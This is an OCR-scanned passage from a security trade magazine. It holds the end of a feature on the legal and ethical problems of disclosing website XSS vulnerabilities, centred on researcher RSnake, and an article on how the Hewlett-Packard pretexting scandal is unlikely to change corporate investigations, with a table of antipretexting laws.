that  comprise  a  vulnerability,  it’s  hard  to 
responsibly  disclose  that  vulnerability. 

“In  some  ways,”  RSnake  says,  “there  is 
no  hope.  I’m  not  comfortable  telling  com¬ 
panies  that  I  know  how  to  protect  them 
from  this.” 

A  WAKE-UP  CALL 
FOR  WEBSITES 

AROUND  BREAKFAST  one  day  late 
last  August,  RSnake  started  a  thread  on 
his  discussion  board,  Sla.ckers.org,  a  site 
frequented  by  hackers  and  researchers 
looking  for  interesting  new  exploits  and 
trends  in  Web  vulnerabilities.  RSnake’s  first 
post  was  titled  “So  it  begins.”  All  that  fol¬ 
lowed  were  two  links,  www.alexa.com  and 
www.altavista.com,  and  a  short  note: 
“These  have  been  out  there  for  a  while  but 
are  still  unfixed.”  Clicking  on  the  links 
exploited  XSS  vulnerabilities  with  a  rea¬ 
sonably  harmless,  proof-of-concept  script. 
RSnake  had  disclosed  vulnerabilities. 

He  did  this  because  he  felt  the  research 
community  and,  more  to  the  point,  the 
public  at  large,  neither  understood  nor 
respected  the  seriousness  and  prevalence 
of  XSS.  It  was  time,  he  says,  to  do  some 
guerilla  vulnerability  disclosure.  “I  want 
them  to  understand  this  isn’t  Joe  Shmoe 
finding  a  little  hole  and  building  a  phish¬ 
ing  site,”  RSnake  says.  “This  is  one  of  the 
pieces  of  the  puzzle  that  could  be  used  as 


that  included  a  proof-of-concept  exploit. 
An  XSS  hole  in  www.gm.com,  for  example, 
simply  delivered  a  pop-up  dialog  box  with 
an  exclamation  mark  in  the  box.  By  early 
October,  anonymous  lurkers  were  contrib¬ 
uting  long  lists  of  XSS-vulnerable  sites.  In 
one  set  of  these,  exploit  links  connected 
to  a  defaced  page  with  Sylvester  Stallone’s 
picture  on  it  and  the  message  “This  page 
has  been  hacked!  You  got  Stallown3d!l” 
The  sites  this  hacker  contributed  included 
the  websites  of  USA  Today,  The  New  York 
Times,  The  Boston  Globe,  ABC,  CBS,  War¬ 
ner  Bros.,  Petco,  Nike,  and  Linens  ’n  Things. 
“What  can  I  say?”  RSnake  wrote.  “We  have 
some  kick-ass  lurkers  here.” 

Some  of  the  XSS  holes  were  closed  up 
shortly  after  appearing  on  the  site.  Oth¬ 
ers  remain  vulnerable.  At  least  one  person 
tried  to  get  the  discussion  board  shut  down, 
RSnake  says,  and  a  couple  of  others  “didn’t 
react  in  a  way  that  I  thought  was  responsi¬ 
ble.”  Contacts  from  a  few  of  the  victim  sites— 
Google  and  Mozilla,  among  others— called 
to  tell  RSnake  they’d  fixed  the  problem  and 
“to  say  thanks  through  gritted  teeth.”  Most 
haven’t  contacted  him,  and  he  suspects 
most  know  about  neither  the  discussion 
thread  nor  their  XSS  vulnerabilities. 

By  early  November  last  year,  the  num¬ 
ber  of  vulnerable  sites  posted  reached 
1,000,  many  discovered  by  RSnake  himself. 
His  signature  on  his  posts  reads  “RSnake— 
Gotta  love  it.”  It  connotes  an  aloofness  that 
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permeates  the  discussion  thread,  as  if  find¬ 
ing  XSS  vulnerabilities  were  too  easy.  It’s 
fun  but  hardly  professionally  interesting, 
like  Tom  Brady  playing  flag  football. 

Clearly,  this  is  not  responsible  disclosure 
by  the  standards  shrink-wrapped  software 
has  come  to  be  judged,  but  RSnake  doesn’t 
think  responsible  disclosure,  even  if  it  were 
somehow  developed  for  Web  vulnerabilities 
(and  we’ve  already  seen  how  hard  that  will 
be,  technically),  can  work.  For  one,  he  says, 
he’d  be  spending  all  day  filling  out  vulner¬ 
ability  reports.  But  more  to  the  point,  “If 
I  went  out  of  my  way  to  tell  them  they’re 
vulnerable,  they  may  or  may  not  fix  it,  and, 
most  importantly,  the  public  doesn’t  get 
that  this  is  a  big  problem.” 

DISCOVERY  IS 
(NOT?)  A  CRIME 

RSNAKE  IS  not  alone  in  his  skepticism 
over  proper  channels  being  used  for  some¬ 
thing  like  XSS  vulnerabilities.  Wysopal 
himself  says  that  responsible  disclosure 
guidelines,  ones  he  helped  develop,  “don’t 
apply  at  all  with  Web  vulnerabilities.” 
Implicit  in  his  and  Christey’s  process  was 
the  idea  that  the  person  disclosing  the  vul¬ 
nerabilities  was  entitled  to  discover  them  in 
the  first  place,  that  the  software  was  theirs 
to  inspect.  (Even  on  your  own  software,  the 
end  user  license  agreement— EULA— and 
the  Digital  Millennium  Copyright  Act— 
DMCA— limit  what  you  can  do  with/to  it). 
The  seemingly  endless  string  of  websites 
RSnake  and  the  small  band  of  hackers  had 
outed  were  not  theirs  to  audit. 

Disclosing  the  XSS  vulnerabilities  on 
those  websites  was  implicitly  confessing 
to  having  discovered  that  vulnerability. 
Posting  the  exploit  code— no  matter  how 
innocuous— was  definitive  proof  of  discov¬ 
ery.  That,  it  turns  out,  might  be  illegal. 

No  one  knows  for  sure  yet  if  it  is,  but  how 
the  law  develops  will  determine  whether 
vulnerability  research  will  get  back  on  track 
or  devolve  into  the  unorganized  bazaar  that 
it  once  was  and  that  RSnake’s  discussion 
board  hints  it  could  be. 

The  case  law  in  this  space  is  sparse,  but 
one  of  the  few  recent  cases  that  address 
vulnerability  discovery  is  not  encouraging. 


A  man  named  Eric  McCarty,  after  allegedly 
being  denied  admission  to  the  University 
of  Southern  California,  hacked  the  online 
admission  system,  copied  seven  records 
from  the  database  and  mailed  the  infor¬ 
mation  under  a  pseudonym  to  a  security 
news  website.  The  website  notified  the  uni¬ 
versity  and  subsequently  published  infor¬ 
mation  about  the  vulnerability.  McCarty 
made  little  attempt  to  cover  his  tracks  and 


even  blogged  about  the  hack.  Soon  enough, 
he  was  charged  with  a  crime.  The  case  is 
somewhat  addled,  says  Jennifer  Granick, 
a  prominent  lawyer  in  the  vulnerability 
disclosure  field  and  executive  director  at 
Stanford’s  Center  for  Internet  and  Society. 
“The  prosecutor  argued  that  it’s  because  he 
copied  the  data  and  sent  it  to  an  unauthor¬ 
ized  person  that  he’s  being  charged,”  says 
Granick,  “but  copying  data  isn’t  illegal.  So 
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Software  Security 


THE  attorney: 

‘Reporting  how  a  website  works 
has  to  be  different  than  attacking  a 

website.”  -Jennifer  Granick,  Stanford  Center 

for  Internet  and  Society 


you’re  prosecuting  for  unauthorized  testing 
of  the  system”— what  any  Web  vulnerability 
discoverer  is  doing— “but  you’re  motivated 
by  what  they  did  with  the  information.  It’s 
kind  of  scary.” 

Two  cases  in  a  similar  vein  preceded 
McCarty’s.  One  was  acquitted  in  less  than 
half  an  hour,  Granick  says;  in  the  other, 
prosecutors  managed  to  convict  the  hacker, 
but,  in  a  strange  twist,  they  dropped  the 
conviction  on  appeal  (Granick  represented 
the  defendant  on  the  appeal).  In  the  USC 
case,  though,  McCarty  pleaded  guilty  to 
unauthorized  access.  Granick  calls  this  “ter¬ 
rible  and  detrimental.” 

“Law  says  you  can’t  access  computers 
without  permission,”  she  explains.  “Permis¬ 
sion  on  a  website  is  implied.  So  far,  we’ve 
relied  on  that.  The  Internet  couldn’t  work 
if  you  had  to  get  permission  every  time  you 
wanted  to  access  something.  But  what  if 
you’re  using  a  website  in  a  way  that’s  pos¬ 
sible  but  that  the  owner  didn’t  intend?  The 
question  is  whether  the  law  prohibits  you 
from  exploring  all  the  ways  a  website  works,” 
including  through  vulnerabilities. 

Granick  would  like  to  see  a  rule  estab¬ 
lished  that  states  it’s  not  illegal  to  report 
truthful  information  about  a  website 
vulnerability,  when  that  information  is 
gleaned  from  taking  the  steps  necessary 
to  find  the  vulnerability,  in  other  words, 
benevolently  exploiting  it.  “Reporting  how 
a  website  works  has  to  be  different  than 
attacking  a  website,”  she  says.  “Without  it, 
you  encourage  bad  disclosure,  or  people 
won’t  do  it  at  all  because  they’re  afraid  of 
the  consequences.”  Already  many  research¬ 
ers,  including  Meunier  at  Purdue,  have 
come  to  view  a  request  for  a  researchers’ 
proof-of-concept  exploit  code  as  a  poten¬ 
tially  aggressive  tactic.  Handing  it  over, 


Meunier  says,  is  a  bad  idea  because  it’s 
proof  that  you’ve  explored  the  website  in 
a  way  the  person  you’re  giving  the  code  to 
did  not  intend.  The  victim  you’re  trying  to 
help  could  submit  that  as  Exhibit  A  in  a 
criminal  trial  against  you. 

RSnake  says  he  thought  about  these 
issues  before  he  started  his  discussion 
thread.  “I  went  back  and  forth  personally,” 
he  says.  “Frankly,  I  don’t  think  it’s  really  ille¬ 
gal.  I  have  no  interest  in  exploiting  the  Web.” 
As  for  others  on  the  discussion  board  “every¬ 
one  on  my  board,  I  believe,  is  nonmalicious.” 
But  he  acknowledges  that  the  specter  of  ille¬ 
gality  and  the  uncertainty  surrounding  Web 
vulnerability  disclosure  are  driving  some 
researchers  away  and  driving  others,  just  as 
Granick  predicted,  to  try  to  disclose  anony¬ 
mously  or  through  back  channels,  which  he 
says  is  unfortunate.  “We’re  like  a  security  lab. 
Trying  to  shut  us  down  is  the  exact  wrong 
response.  It  doesn’t  make  the  problem  go 
away.  If  anything,  it  makes  it  worse.  What 
we’re  doing  is  not  meant  to  hurt  companies. 
It’s  meant  to  make  them  protect  themselves. 
I’m  a  consumer  advocate.” 

A  LIMITED  POOL 
OF  BRAVERY 

What  happens  next  depends,  largely,  on 
those  who  publish  vulnerable  software 
on  the  Web.  Will  those  with  vulnerable 
websites,  instead  of  attacking  the  messen¬ 
ger,  work  with  the  research  community  to 
develop  some  kind  of  responsible  disclo¬ 
sure  process  for  Web  vulnerabilities,  as 
complex  and  uncertain  a  prospect  as  that 
is?  Christey  remains  optimistic.  “Just  as 
with  shrink-wrapped  software  five  years 
ago,  there  are  no  security  contacts  and 
response  teams  for  Web  vulnerabilities.  In 
some  ways,  it’s  the  same  thing  over  again.  If 


the  dynamic  Web  follows  the  same  pattern, 
it  will  get  worse  before  it  gets  better,  but 
at  least  we’re  not  at  square  one.”  Christey 
says  his  hope  rests  in  part  on  an  efficacious 
public  that  demands  better  software  and  a 
more  secure  Internet,  something  he  says 
hasn’t  materialized  yet. 

Or  will  they  start  suing,  threatening, 
harassing  those  who  discover  and  disclose 
their  Web  vulnerabilities  regardless  of  the 
researchers’  intention,  confidently  cutting 
the  current  with  the  winds  of  McCarty’s 
guilty  plea  filling  their  sails?  Certainly 
this  prospect  concerns  legal  scholars  and 
researchers,  even  ones  who  are  pressing 
forward  and  discovering  and  disclosing 
Web  vulnerabilities  despite  the  current 
uncertainty  and  risk.  Noble  as  his  inten¬ 
tions  may  be,  RSnake  is  not  in  the  business 
of  martyrdom.  He  says,  “If  the  FBI  came  to 
my  door  [asking  for  information  on  people 
posting  to  the  discussion  board],  I’d  say 
'Here’s  their  IP  address.’  I  do  not  protect 
them.  They  know  that.” 

He  sounds  much  as  Meunier  did  when 
he  conceded  that  he’d  have  turned  over  his 
student  if  it  had  come  to  that.  In  the  fifth 
and  final  point  he  provides  for  students 
telling  them  that  he  wants  no  part  of  their 
vulnerability  discovery  and  disclosure,  he 
writes:  “I’ve  exhausted  my  limited  pool  of 
bravery.  Despite  the  possible  benefits  to  the 
university  and  society  at  large,  I’m  intimi¬ 
dated  by  the  possible  consequences  to  my 
career,  bank  account  and  sanity.  I  agree  with 
[noted  security  researcher]  H.D.  Moore,  as 
far  as  production  websites  are  concerned: 
‘There  is  no  way  to  report  a  vulnerability 
safely.’”  ■ 


E-mail  feedback  to  Senior  Editor  Scott  Berinato  at 
sberinato@cxo.com. 
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Things  About 
Corporate 

Invesugtitions 
That  Wont 
Change 

As  a  Result  of  the  Hewlett-Packard  Scandal 


BY  SARAH  D.  SCALET 


ON  MAY  24,  2006,  Hewlett-Pack¬ 
ard’s  director  of  ethics  sent  out  an 
internal  memo  stamped  “Attorney- 
Client  Privileged”  that  contained 
12  pages’  worth  of  detective  work 
that  would  make  any  sleuth  stand  proud. 

The  memo,  sent  by  Kevin  T.  Hunsaker  to  the 
company’s  CEO,  general  counsel  and  board  of 
directors  (and  made  public  after  a  congressional 
hearing  this  past  September),  summarized  the 
work  that  a  group  of  HP  investigators  had  done 
to  determine  an  unnamed  source  for  an  article 
published  by  CNET  on  Jan.  23,  200 6.  The  article 
contained  details  about  a  board  meeting  that  HP 
chairwoman  Patricia  Dunn  did  not  want  made 
public.  In  painstaking  detail,  the  investigative  team 
laid  out  its  findings. 

Investigators  had  analyzed  10,000  news  articles 


about  HP  published  over  a  six-year  time  frame 
and  indexed  1,000  articles  written  by  the  CNET 
reporter,  Dawn  Kawamoto.  They  had  reviewed  all 
the  documentation  that  the  board  of  directors  had 
generated  and  relied  upon  for  the  meeting,  as  well 
as  information  about  the  meeting  that  was  avail¬ 
able  publicly  or  to  other  HP  employees.  They  had 
conducted  extensive  searches  of  HP’s  e-mail  and 
Internet  servers,  and  interviewed  employees  and 
board  members  in  grueling  detail  about  specific 
information  that  had  been  leaked  to  CNET  and 
other  publications  over  the  years. 

By  page  13  of  the  memo,  the  case  seemed 
pretty  well  sealed  up.  Investigators  picked  apart 
the  language  and  facts  for  which  Kawamoto  cited 
an  unnamed  HP  source,  with  the  pool  of  pos¬ 
sible  sources  dwindling  down  to  one.  In  2002,  the 
“source”  knew  details  about  a  licensing  agreement 
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with  Intel  in  1993;  only  two  current  board  members  would 
know  those  details.  In  2003,  the  “source”  spoke  in  glowing 
terms  of  HP’s  portfolio  of  patents;  this  was  a  favorite  talking 
point  of  one  board  member.  In  2006,  the  “source”  used  the 
term  lectures,  “an  academic  term,  rarely  used  in  the  business 
environment”;  only  one  board  member  had  an  academic  back¬ 
ground.  In  2001,  one  board  member  had  cultivated  a  relation¬ 
ship  with  Kawamoto,  at  former  CEO  Carly  Fiorina’s  request, 
to  promote  HP’s  merger  with  Compaq.  And  so  it  went.  In  each 
instance,  that  board  member  was  George  W.  Keyworth  II. 

The  evidence  was  largely  circumstantial,  but  this  wasn’t  a 
criminal  case.  This  was  an  internal  investigation  meant  to  help 
chairwoman  Dunn  and  CEO  Mark  Hurd  plug  the  leaks. 

The  trouble  began  when  investigators  sought  to  put  the  final 
nails  in  Keyworth’s  coffin.  “...[A]t  5:25  p.m.  PST  on  January 
18,  2006. ..a  call  was  made  from  Kawamoto’s  cell  phone  to 
Keyworth’s  home  in  Piedmont,  California,”  reads  a  sentence 
on  page  13.  “The  call  lasted  approximately  one  minute.” 

There  began  a  litany  of  details  from  private  phone  records 
that  no  scrupulous  investigator  would  have  been  able  to  obtain 
without  help  from  law  enforcement.  The  12  pages  of  material  that 
would  make  any  investigators  stand  tall  were  actually  embedded 
in  an  18-page  document  that  also  spoke  of  things  more  likely  to 
make  them  slouch  in  their  seats— covert  intelligence  gathering, 
video  surveillance  and  “third-party  phone  information.” 

Yet  it  was  an  effective  campaign.  By  page  17,  Keyworth  had 


admitted  to  investigators  and  the  board  that  he  was  the  source, 
explaining,  in  investigators’  words,  that  “he  thought  it  was  in 
the  best  interests  of  HP  for  the  information  in  the  January  23 
article  to  be  made  public.”  Keyworth  would  soon  resign. 

What  followed  is  painfully  well-known.  Felony  charges  from 
the  California  Attorney  General  against  five  people  who  allegedly 
were  involved  with  accessing  private  phone  records  under  false 
pretenses.  Several  resignations,  including  Hunsaker,  Dunn  and 
Anthony  Gentilucci,  manager  of  global  security  investigations. 
Congressional  hearings  where  some  HP  executives  pleaded  the 
Fifth  Amendment  and  some  lawmakers  compared  the  scenario 
to  Enron  and  Watergate.  Salacious  details  of  how  investiga¬ 
tors  trailed  a  board  member  from  California  to  Colorado,  used 
e-mail  tracing  technology  unknown  outside  of  the  marketing 
and  investigations  worlds,  and  even  considered  planting  spies  in 
newsrooms.  Hurd’s  very  public  apology.  A  $14.5  million  settle¬ 
ment  HP  reached  with  California  to  resolve  civil  claims  in  the 
case.  (HP  refused  to  comment  for  this  story.) 

The  HP  investigation  was  expensive,  invasive,  out  of  scale 
with  the  problem  and  largely  unnecessary.  In  short,  it  is  prob¬ 
ably  the  stupidest  thing  HP  has  ever  done.  And  that’s  exactly 
why,  despite  what  some  may  hope,  it  is  unlikely  to  have  a  lasting 
impact  on  how  corporations  run  investigations. 

To  those  who  say  that  HP  will  change  everything,  we  say, 
yeah  right.  Instead,  we  proffer  five  things  that  the  HP  investiga¬ 
tion  wont  change— at  least,  not  in  the  way  one  might  expect. 


Legislation 

Snapshot 

A  look  at  new  and  pending 
antipretexting  laws 

Is  pretexting  to  obtain  telephone  records 
illegal?  In  California,  Attorney  General 
Bill  Lockyer  thinks  so.  He  has  filed  felony 
charges  against  five  individuals  involved 
with  the  Hewlett-Packard  investigation  who 
allegedly  obtained  private  telephone  records 
under  false  pretenses.  The  complaint,  filed 
in  October,  charges  each  of  the  defendants 
with  four  felony  counts,  including  fraudulent 
wire  communications,  the  wrongful  use  of 
computer  data  and  identify  theft. 

Nevertheless,  many  legislators— includ¬ 
ing  state  senators  in  California— see  the 
need  for  more  clarity  when  it  comes  to  who 
can  access  telephone  records,  and  when. 
The  following  is  a  sampling  of  new  and 
proposed  antipretexting  legislation. 


LAW 

STATUS 

WHAT  IT  WOULD  DO 

California  S.B.  202, 

Amendment  to  the 
penal  code  related 
to  privacy 

Signed  by 
governor  on 

Sept.  29,  2006 

Makes  it  a  crime  to  purchase  or  sell,  or  conspire 
to  purchase  or  sell,  phone  records  without  the 
subscriber’s  written  consent. 

Illinois  S.B.  2554, 

Amendment  to  the 
Identity  Theft  Law 
of  1961 

Took  effect 

July  5,  2006 

Prohibits  the  use  of  personal  information  to  gain 
access  to  any  record  of  actions,  communications, 
or  other  activities  or  transactions  of  a  person, 
without  prior  permission  from  that  person. 

New  York  S. 

6723,  Consumer 
Communication 
Records  Privacy 

Act 

Took  effect 

Sept.  26,  2006 

Prohibits  the  procurement,  sale  or  use  of  telephone 
record  information  without  the  authorization  of  the 
consumer.  Exceptions:  cases  where  other  parties 
have  a  legitimate  interest  in  such  information,  such 
as  law  enforcement  agencies  prosecuting  crimes. 

U.S.  H.R.4709, 

Telephone  Records 
and  Privacy 
Protection  Act  of 
2006 

Passed  House 
on  April  25, 
2006.  Passed 
Senate  on  Dec. 

8,  2006.  Bill 
was  awaiting 
President 

Bush’s 
signature  at 
press  time. 

Establishes  criminal  penalties  for  obtaining,  or 
attempting  to  obtain,  confidential  phone  records 
under  false  pretenses,  or  accessing  customer 
accounts  via  the  Internet  without  prior  customer 
authorization.  H.R.  4709  was  one  of  several 
competing  bills  introduced  in  Congress  in  early 

2006.  Unlike  other  bills,  H.R.  4709  includes  a 
controversial  exemption  for  law  enforcement 
agencies.  It  also  does  not  describe  steps  phone 
companies  should  take  to  protect  customer 
records. 
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ASSUMPTION  #1  This  is  a  wake-up  call 
to  corporate  America  about  the  risks  of 
botched  investigations. 

AS  TH  E  scandal  unfolded,  Bill  Wipprecht,  CSO  of  Wells  Fargo 
in  San  Francisco,  worked  on  some  elevator  “talking  points.” 

In  between  floors  1  and  12,  he  says,  “When  other  executives 
say,  ‘What  do  you  think  of  that?’  you  have  to  be  able  to  respond 
instead  of  just  fumbling  for  your  keys.” 

For  his  part,  Wipprecht  likes  to  say  that  because  the  media 
benefits  from  leaks,  journalists  didn’t  focus  on  what  Keyworth 
did  wrong.  He  also  asserts  that  because  Wells  Fargo  is  in  a 
highly  regulated  industry,  his  investigations  group  doesn’t  take 
any  chances  by  using  risky  techniques  that  wouldn’t,  as  he  puts 
it,  play  well  on  the  evening  news.  “We’re  already  overregulated, 
and  we  think  we’re  knowledgeable  about  all  the  laws,”  says  Wip¬ 
precht,  whose  group  typically  investigates  things  such  as  cash 
shortages,  mortgage  fraud  and  expense  abuse. 

Likewise,  the  senior  director  of  loss  prevention  at  Luxot- 
tica  Retail,  who’s  a  member  of  the  ASIS  Retail  Loss  Prevention 
Council,  insisted  that  he  hadn’t  experienced  any  extra  scrutiny 
on  the  investigations  his  group  runs,  which  are  typically  back¬ 
ground  checks  on  new  employees  or  investigations  into  thefts 
from  stores. 

“I  have  no  intention  of  scaling  back,  because  I  know  our 
investigations  are  done  under  guidelines  and  the  law,”  says 
Alan  Greggo,  whose  company  operates  4,600  retail  locations 
including  LensCrafters,  Pearl  Vision  and  Sunglass  Hut.  Checks 
and  balances  are  key,  he  says.  Any  use  of  the  company’s  camera 
system,  for  instance,  must  be  approved  by  a  senior  director 
and  the  legal  department;  results  of  investigations  must  be 
reviewed  by  a  director-level  loss  prevention  associate  to  make 
sure  evidence  is  used  properly. 

Elsewhere,  CSOs  were  looking  at  their  policies  and  largely 
concluding  that  they  had  appropriate  guidelines  in  place. 
Recruiter  Kathy  Lavinder,  executive  director  of  Security  and 
Investigative  Placement  Consultants  in  Bethesda,  Md.,  says 
some  of  her  clients  were  dusting  off  their  policies,  pushing 
them  out  to  their  chains  of  command,  and  emphasizing  that 
certain  tactics— such  as  pretexting  to  obtain  private  telephone 
records— were  not  allowed.  She  adds  that  no  one  she  talked  to 
had  indicated  they  ever  permitted  such  activities.  But  she  didn’t 
seem  convinced  that  the  HP  investigation  would  necessarily 
result  in  any  seismic  changes. 

“I  think  there’ll  be  a  lot  of  talk,”  Lavinder  predicts.  “In  some 
cases  it  will  be  genuine,  and  in  some  cases  it  will  be  window 
dressing.  A  certain  number  of  senior  executives  want  to  do 
what  they’ve  always  done,  which  is  to  some  extent  turn  a  blind 
eye,  particularly  if  an  investigation  is  outsourced.  Don’t  ask, 
don’t  tell.  That’s  a  risky  strategy,  but  I  think  we’ll  see  some  of 
that  as  well.” 

What  makes  this  easy  to  do,  given  the  circumstances,  is  that 


the  HP  case  appears  to  be  an  outlier— something  so  outland- 
ishly  awful  that  the  industry  can  shrug  its  collective  shoulders 
and  simply  disregard  it.  Companies  can  say,  “It  won’t  happen 
to  us,”  because  it  probably  won’t.  Furthermore,  if  people  with 
lots  of  money  and  power  are  committed  to  a  project  that  consti¬ 
tutes  an  epic  lapse  in  judgment,  it’s  very  difficult  to  stop  them. 
Sad,  but  true. 

Reality  check:  For  better  or  worse,  HP  is  a  talking  point,  not 
an  industry-changing  event. 

ASSUMPTION  #2  Companies  will  quit 
exposing  themselves  to  the  risks  of  third- 
party  investigators,  who  themselves  may 
outsource  some  investigations  work. 

IF  THE  execution  of  the  HP  investigation  was  an  outlier,  it 
was  also  an  extremely  unusual  operation  from  the  get-go.  After 
all,  an  investigation  involving  board  members  is  not  an  every¬ 
day  job  even  for  the  most  seasoned  internal  fraud  examiner  or 
loss  prevention  specialist.  In  fact,  it’s  the  very  kind  of  special¬ 
ized  task  that  probably  ought  to  be  outsourced. 

“Third-party  investigators  are  an  important  part  of  the 
process  that  corporate  America  and  retailers  use,”  says  Joe 
LaRocca,  VP  of  loss  prevention  for  the  National  Retail  Federa¬ 
tion,  a  lobbying  group  in  Washington,  D.C.  If  you  want  to  find 
out  if  a  potential  hire  has  a  criminal  history,  for  instance,  you 
might  hire  a  firm  with  expertise  in  researching  public  records. 
“You’re  going  to  go  to  a  third  party  because  they’re  the  experts 
in  getting  the  information.” 

“I  don’t  think  of  it  as  outsourcing,”  says  Regis  Becker,  director 
of  global  security  and  compliance  at  PPG  Industries,  the  Pitts¬ 
burgh-based  industrial  manufacturer.  “We  use  what  we  call 
‘stringers’”— highly  competent  retired  agents  from  the  military, 
FBI  and  Secret  Service  who  set  up  small  investigative  shops. 
“They  have  the  training,  they  understand  the  law  and  they  don’t 
have  to  be  briefed  on  every  detail.  Everybody  is  working  from 
the  same  page.” 

Most  often,  this  large  stable  of  seasoned  investigators  avail¬ 
able  for  contract  work  makes  the  use  of  third-party  investiga¬ 
tors  simply  a  good  business  practice. 

If  HP  had  had  only  its  internal  investigators  working  the 
case,  rather  than  turning  to  third  parties,  people  would  be 
questioning  that  decision,  too. 

“A  good  outside  law  firm  would  say,  Why  do  you  have  your 
loss-prevention  and  anti-piracy  guys  doing  this?  What  do  they 
know  about  it?”  says  David  Caruso,  founder  of  the  Dominion 
Advisory  Group,  who  was  brought  in  as  executive  vice  president 
of  compliance  and  security  at  Riggs  Bank  after  the  Au gusto 
Pinochet  money  laundering  scandal  in  2003. 

Of  course,  people  in  the  security  world  have  always  known 
that  sometimes  this  method  is  used  to  keep  less  savory  inves¬ 
tigative  techniques  at  arm’s  length.  Just  think  back  to  the  infa- 
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Investigations 


mous  P&G  Dumpster  diving  case  in  2001.  The  consumer  goods 
company  paid  Unilever  $10  million  after  being  caught  hiring  a 
competitive  intelligence  firm  to  conduct  an  investigation  that 
involved  going  through  its  rival’s  trash. 

It’s  up  to  CSOs  to  make  sure  that  their  companies  choose 
firms  carefully  and  monitor  them  well.  “If  you  have  to  hire  a  con¬ 
tractor  to  run  investigations,”  Caruso  warns,  “you  have  to  actively 
manage  what  you’re  doing.”  But  that’s  nothing  new,  either. 

Reality  check:  Companies  should  monitor  their  third-party 
investigators,  but  it  would  take  a  lot  more  than  HP’s  black  eye 
to  make  them  move  investigations  in-house. 

ASSUMPTION  #3  Congress  will  pass 
an  antipretexting  law  because  of  the 
revelation  that  HP  investigators  obtained 
phone  records  using  false  identities. 

“ARE  YOU  familiar  with  the  term  ‘pretexting?’”  Rep.  Joe  Bar¬ 
ton  (R-Texas)  asked  one  of  the  witnesses  who  had  been  called 
to  testify  before  a  House  Energy  and  Commerce  subcommittee, 
not  about  the  HP  investigation  but  about  consumer  privacy. 
“There  are  companies  now,”  he  continued,  “that  are  in  existence 
to  proactively  invade  your  privacy  and  sell  the  results  of  their 


ill-gotten  gains  to  anybody  with  100  bucks.” 

Rep.  Barton  should  know.  After  extensive  hearings  on 
pretexting,  he  and  29  cosponsors— both  Republican  and 
Democrat— already  had  introduced  legislation,  H.R.  4943,  to 
“prohibit  fraudulent  access  to  telephone  records.”  The  bill  had 
passed  Barton’s  committee  unanimously.  Several  competing 
pretexting  bills  had  been  introduced.  A  bipartisan  Senate  bill,  S. 
2178,  would  “make  the  stealing  and  selling  of  telephone  records 
a  criminal  offense.”  Another  House  bill,  H.R.  4709,  set  criminal 
penalties  for  obtaining  phone  records  under  false  pretenses. 

The  date  of  this  particular  hearing  at  which  Barton  brought 
up  pretexting  was  June  20,  2006— a  full  three  months  before 
HP  executives  would  again  find  themselves  on  the  stand  at 
another  hearing  that  involved  telephone  pretexting.  Rep.  Bar¬ 
ton  had  introduced  his  legislation  back  in  March  2006;  com¬ 
peting  bills  were  introduced  even  earlier,  and  H.R.  4709  won 
unanimous  House  approval  in  April  2006. 

Although  he  wasn’t  questioned  about  pretexting,  Scott 
Taylor,  the  chief  privacy  officer  of  HP,  spoke  that  day  of  his 
company’s  commitment  to  protecting  the  personal  information 
it  collects  about  customers.  “[P]rivacy  is  actually  a  core  value 
at  HP,”  he  said. 
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The  HP  investigation  scandal  brought  new  awareness  to 
pretexting  for  telephone  records,  but  the  fact  is  that  Congress 
was  already  well  aware  of  the  practice  and  was  taking  steps 
to  criminalize  it.  Indeed,  as  far  back  as  2000,  a  committee 
had  investigated  why  pretexting— yes,  they  used  that  exact 
word— for  personal  banking  records  was  still  proving  successful 
despite  the  passage  of  privacy  provisions  in  the  Gramm-Leach- 
Bliley  Act. 

The  federal  telephone  pretexting  bills  stalled,  however,  and 
even  the  HP  hearings  in  September  didn’t  budge  them.  It  wasn’t 
until  after  the  elections,  on  Dec.  8,  2006,  that  the  Senate  passed 
H.R.  4709,  advancing  the  bill  to  the  White  House. 

What  HP  did  make  clear  was  that  everyone  agrees  on  the 
need  for  a  federal  law  clarifying  who  can  and  cannot  access 
phone  records.  Enforcing  it  will  be  another  story. 

Reality  check:  Federal  law  protecting  the  privacy  of  cus¬ 
tomer  phone  records  is  likely,  but  it  was  already  in  the  works. 

ASSUMPTION  #4  Investigators  will 
stop  using  telephone  call  records  to  build 
cases. 

LET’S  BE  clear  here.  Telephone  records  are  a  routine  part  of 
investigations,  and  no  single  law  is  going  to  change  that. 

Company  phone  records,  for  instance,  are  routinely  used  for 
internal  investigations,  and  no  one  blinks  an  eye.  Employees 
simply  don’t  have  a  reasonable  expectation  of  privacy  about 
calls  they  make  and  receive  on  company  phone  systems. 

Likewise,  phone  records  are  also  routinely  used  for  investi¬ 
gations  done  by  law  enforcement,  especially  after  the  passage 
of  the  USA  Patriot  Act.  Sometimes  records  are  obtained  with 
subpoenas;  other  times  they’re  released  as  a  courtesy.  Large 
telecommunications  companies  even  have  staffs  in  charge  of 
responding  to  these  requests  for  telephone  and  ISP  records. 

A  law  protecting  private  phone  records  would  make  it  more 
difficult  to  obtain  records  outside  of  those  two  circumstances. 
But  no  one  thinks  it  will  stop  the  practice.  It’ll  just  change  how 
individuals  weigh  the  risks  and  possible  rewards  of  accessing 
such  records. 

“I  think  the  HP  case  will  turn  people  away  from  phone 
records,  but  in  a  cheating  spouse  situation  or  with  a  business 
partner  gone  bad,  I  think  people  are  going  to  take  that  upon 
themselves  to  hunt  around  for  that  information,”  the  National 
Retail  Federation’s  LaRocca  says. 

“There  are  always  people  out  there  who  can  get  you  any  kind 
of  information,  anytime,  anywhere,  and  if  you  hire  those  people 
they’ll  get  it  for  you,”  Wells  Fargo’s  Wipprecht  says.  “The  ques¬ 
tion  is,  do  you  really  want  to  know?” 

Reality  check:  There  are  legitimate  ways  to  obtain  private 
phone  records,  and  the  illegitimate  ways  won’t  disappear  over¬ 
night. 


ASSUMPTION  #5  Companies  will  hire 
law  firms,  not  investigations  firms,  so  that 
investigations  are  done  by  the  book. 

INVESTIGATIVE  FIRMS  aren’t  the  only  ones  hired  to  do 
investigations.  There’s  a  booming  business  right  now  for  law 
firms  that  do  investigations— and  that’s  not  going  to  change. 

“A  lot  of  investigations  that  would  have  been  handed  out  to 
a  small  investigative  boutique  will  instead  go  to  a  reputable 
law  firm,”  predicts  Lavinder  of  Security  and  Investigative  Place¬ 
ment  Consultants,  noting  that  this  is  a  trend  she’s  been  observ¬ 
ing  for  a  while. 

These  are  firms  such  as  the  New  York  City-based  Debevoise 
&  Plimpton,  which  did  an  internal  investigation  into  whether 
Merck  executives  knew  about  dangers  of  the  arthritis  drug 
Vioxx;  and  WilmerHale,  the  firm  based  in  Washington,  D.C., 
